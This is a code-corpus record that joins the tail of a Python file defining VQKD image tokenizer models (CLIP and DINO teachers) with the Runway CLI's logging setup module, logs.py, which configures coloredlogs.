del weights[k]
model.load_state_dict(weights)
return model
@register_model
def vqkd_encoder_base_decoder_3x768x12_clip(pretrained=False, pretrained_weight=None, as_tokenzer=False, img_size=224,
n_code=8192, code_dim=32, **kwargs):
encoder_config, decoder_config = get_model_default_params(), get_model_default_params()
# encoder settings
encoder_config['img_size'] = img_size
encoder_config['num_classes'] = 0
# decoder settings
decoder_config['img_size'] = img_size // decoder_config['patch_size']
decoder_config['patch_size'] = 1
decoder_config['in_chans'] = code_dim
decoder_config['num_classes'] = 0
decoder_config['depth'] = 3
# teacher settings
_ = kwargs.pop("teacher_model_type", "clip")
teacher_model_type = 'clip' if not as_tokenzer else 'None'
decoder_out_dim = 512
model = VQKD(encoder_config, decoder_config, n_code, code_dim, teacher_model_type=teacher_model_type,
decoder_out_dim=decoder_out_dim, **kwargs)
if as_tokenzer:
assert pretrained
assert pretrained_weight is not None
if pretrained_weight.startswith('https'):
weights = torch.hub.load_state_dict_from_url(pretrained_weight, map_location='cpu', check_hash=True)
else:
weights = torch.load(pretrained_weight, map_location='cpu')
if 'model' in weights:
weights = weights['model']
else:
weights = weights["state_dict"]
keys = list(weights.keys())
for k in keys:
if k.startswith("loss") or k.startswith("teacher") or k.startswith("scaling"):
del weights[k]
model.load_state_dict(weights)
return model
@register_model
def vqkd_encoder_base_decoder_1x768x12_dino(pretrained=False, pretrained_weight=None, as_tokenzer=False, img_size=224,
n_code=8192, code_dim=32, **kwargs):
encoder_config, decoder_config = get_model_default_params(), get_model_default_params()
# encoder settings
encoder_config['img_size'] = img_size
encoder_config['num_classes'] = 0
# decoder settings
decoder_config['img_size'] = img_size // decoder_config['patch_size']
decoder_config['patch_size'] = 1
decoder_config['in_chans'] = code_dim
decoder_config['num_classes'] = 0
decoder_config['depth'] = 1
# teacher settings
_ = kwargs.pop("teacher_model_type", "dino")
teacher_model_type = 'dino' if not as_tokenzer else 'None'
decoder_out_dim = 768
model = VQKD(encoder_config, decoder_config, n_code, code_dim, teacher_model_type=teacher_model_type,
decoder_out_dim=decoder_out_dim, **kwargs)
if as_tokenzer:
assert pretrained
assert pretrained_weight is not None
if pretrained_weight.startswith('https'):
weights = torch.hub.load_state_dict_from_url(pretrained_weight, map_location='cpu', check_hash=True)
else:
weights = torch.load(pretrained_weight, map_location='cpu')
if 'model' in weights:
weights = weights['model']
else:
weights = weights["state_dict"]
keys = list(weights.keys())
for k in keys:
if k.startswith("loss") or k.startswith("teacher") or k.startswith("scaling"):
del weights[k]
model.load_state_dict(weights)
return model
if __name__ == '__main__':
pass
|
785231a77f42cc3738813474dcd19fe864689030
|
e03bce53de6f88c0e09f56e4fe11c36af0f1161f
|
/runway/_cli/logs.py
|
994fa7408539b5c1f212569f08ac2b36488d2b19
|
[
"Apache-2.0"
] |
permissive
|
onicagroup/runway
|
20c31df9cbc1a1ffc5c9aa468ce5cf7d6ac7899f
|
0763b06aee07d2cf3f037a49ca0cb81a048c5deb
|
refs/heads/master
| 2023-08-30T22:35:54.113981
| 2023-08-29T14:13:35
| 2023-08-29T14:13:35
| 122,529,924
| 156
| 79
|
Apache-2.0
| 2023-09-13T13:43:50
| 2018-02-22T20:12:55
|
Python
|
UTF-8
|
Python
| false
| false
| 4,395
|
py
|
logs.py
|
"""Runway CLI logging setup."""
import logging
import os
from typing import Any, Dict
import coloredlogs
from runway import LogLevels
from ..compat import cached_property
# COLOR_FORMAT = "%(levelname)s:%(name)s:\033[%(color)sm%(message)s\033[39m"
LOGGER = logging.getLogger("runway")
LOG_FORMAT = "[runway] %(message)s"
LOG_FORMAT_VERBOSE = logging.BASIC_FORMAT
LOG_FIELD_STYLES: Dict[str, Dict[str, Any]] = {
"asctime": {},
"hostname": {},
"levelname": {},
"message": {},
"name": {},
"prefix": {},
"programname": {},
}
LOG_LEVEL_STYLES: Dict[str, Dict[str, Any]] = {
"critical": {"color": "red", "bold": True},
"debug": {"color": "green"},
"error": {"color": "red"},
"info": {},
"notice": {"color": "yellow"},
"spam": {"color": "green", "faint": True},
"success": {"color": "green", "bold": True},
"verbose": {"color": "cyan"},
"warning": {"color": 214},
}
class LogSettings:
"""CLI log settings."""
ENV = {
"field_styles": os.getenv("RUNWAY_LOG_FIELD_STYLES"),
"fmt": os.getenv("RUNWAY_LOG_FORMAT"),
"level_styles": os.getenv("RUNWAY_LOG_LEVEL_STYLES"),
}
def __init__(
self, *, debug: int = 0, no_color: bool = False, verbose: bool = False
):
"""Instantiate class.
Args:
debug: Debug level.
no_color: Disable color in Runway's logs.
verbose: Whether to display verbose logs.
"""
self.debug = debug
self.no_color = no_color
self.verbose = verbose
@property
def coloredlogs(self) -> Dict[str, Any]:
"""Return settings for coloredlogs."""
return {
"fmt": self.fmt,
"field_styles": self.field_styles,
"level_styles": self.level_styles,
}
@cached_property
def fmt(self) -> str:
"""Return log record format.
If "RUNWAY_LOG_FORMAT" exists in the environment, it will be used.
"""
fmt = self.ENV["fmt"]
if isinstance(fmt, str):
return fmt
if self.debug or self.no_color or self.verbose:
return LOG_FORMAT_VERBOSE
return LOG_FORMAT
@cached_property
def field_styles(self) -> Dict[str, Any]:
"""Return log field styles.
If "RUNWAY_LOG_FIELD_STYLES" exists in the environment, it will be
used to update the Runway LOG_FIELD_STYLES.
"""
if self.no_color:
return {}
result = LOG_FIELD_STYLES.copy()
if self.ENV["field_styles"]:
result.update(
coloredlogs.parse_encoded_styles( # type: ignore
self.ENV["field_styles"]
)
)
return result
@cached_property
def level_styles(self) -> Dict[str, Any]:
"""Return log level styles.
If "RUNWAY_LOG_LEVEL_STYLES" exists in the environment, it will be
used to update the Runway LOG_LEVEL_STYLES.
"""
if self.no_color:
return {}
result = LOG_LEVEL_STYLES.copy()
if self.ENV["level_styles"]:
result.update(
coloredlogs.parse_encoded_styles( # type: ignore
self.ENV["level_styles"]
)
)
return result
@cached_property
def log_level(self) -> LogLevels:
"""Return log level to use."""
if self.debug:
return LogLevels.DEBUG
if self.verbose:
return LogLevels.VERBOSE
return LogLevels.INFO
def setup_logging(
*, debug: int = 0, no_color: bool = False, verbose: bool = False
) -> None:
"""Configure log settings for Runway CLI.
Keyword Args:
debug: Debug level (0-2).
no_color: Whether to use colorized logs.
verbose: Use verbose logging.
"""
settings = LogSettings(debug=debug, no_color=no_color, verbose=verbose)
coloredlogs.install(settings.log_level, logger=LOGGER, **settings.coloredlogs)
LOGGER.debug("runway log level: %s", LOGGER.getEffectiveLevel())
if settings.debug == 2:
coloredlogs.install(
settings.log_level,
logger=logging.getLogger("botocore"),
**settings.coloredlogs,
)
LOGGER.debug("set dependency log level to debug")
LOGGER.debug("initialized logging for Runway")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.